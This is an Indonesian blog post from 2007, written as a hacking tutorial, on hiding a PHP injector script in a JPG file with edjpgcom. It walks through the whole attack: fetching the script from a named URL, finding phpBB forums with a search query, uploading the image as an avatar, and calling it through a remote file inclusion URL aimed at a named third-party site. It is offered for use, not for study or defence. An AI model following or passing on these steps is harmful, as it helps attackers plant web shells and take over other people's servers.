Sabtu, 06 Oktober 2007

Membuat injector berformat JPG


Membuat injector berformat JPG an di titipkan ke situs forum
tulisan ini saya ambil setelah melihat video dari www.milw0rm.com, mungkin bagi beberapa orang tidak ada yang spesial dari tulisan ini... tapi tak apalah, saya menulis cuma sekedar buat mengisi waktu rutinitas yang membosan kan... (sumpah bosen saya)

kalo situ mau melihat video-nya ada disini http://milw0rm.com/video/watch.php?id=57

setelah saya melihat itu saya mempunyai ya keinginan untuk membuat inject an yang berupa gambar yang bisa dititipkan / upload di situs² forum yang menyediakan fasilitas avatar dari lokal komputer.

yang diperlukan adalah :
1. gambar jpg, atau yang lain
2. software edjpgcom (tanyakan kepada paman google, tau kok beliau)
3. script injector (kalo nggak ada berikut url nya ---- pluto.phpnet.us/cmdx.txt)

okeh... sebenarnya kalau melihat videonya tadi nggak perlu membaca tulisan ini kok, hehehee

1. siapkan gambar jpg dan buka dengan open with dan pilih dengan program edjpgcom

2. masukkan script injectan ke dalam software edjpgcom tadi dan tekan OK

3. jadi lah... injectornya dalam format jpg (ketika di buka file tetap berupa gambar... tetapi ketika di injectkan.. binggo..)

4. cari cari situs yang menyediakan fasilitas upload avatar, ketik di gogle "powered by phpbb" dan coba akses situs nya cari yang suport upload file dari lokal dengan melihat propertis dari gambar avatar (jika www.target.com/bla/bla/wejjwewe.jpg berarti boleh)

5. register dalam forum tersebut dan edit profile kamu, upload gambar injectan tadi.. dalam avatar kamu.

6. setelah berhasil... klik kanan view page source dan cari dari source tadi kata jpg ( ctr F jpg dan enter) ketika kamu mendapatkan lokasi file tadi berarti adalah itu lokasi injectormu.. kalau jadi seperti ini... http://forum.skife-unair.web.id/images/avatars/79722394045ec256aa55e6.jpg
(ini situs saya loh awas jangan di isi hehehe nggak papa sih kalo cuma buat liat²)
7. sekarang kita coba inject kan http://www.glas.ruseeu.info//core/editor.php?editor_insert_bottom=http://forum.skife-unair.web.id/images/avatars/79722394045ec256aa55e6.jpg?

kalian bisa berkreasi lebih... mak maaf kan saya,.. hiks hiks

Tidak ada komentar: